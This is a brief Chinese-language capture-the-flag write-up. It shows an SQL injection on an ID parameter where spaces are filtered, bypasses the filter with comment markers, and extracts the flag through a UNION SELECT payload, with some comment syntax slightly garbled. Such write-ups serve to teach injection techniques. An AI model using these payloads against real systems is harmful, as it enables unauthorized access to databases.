-
输入1 观察输出信息
显示出ID值和name,可判断出ID是注入点
-
输入1 and 1=1 和 1 and 1=2
怀疑过滤了and等关键字
再输入1and1=1
可以确定被过滤的是空格
-
绕过空格的方式有一对英文()或者一对注释符//
故可构造1/* * /and//1=1
-
猜测flag在flag表中
因此有1’/* * /union/* * /select/* * /flag/ * * /from/ * * /flag/ * * /where/ * * /‘1’='1 (注意单引号需闭合)
得到flag。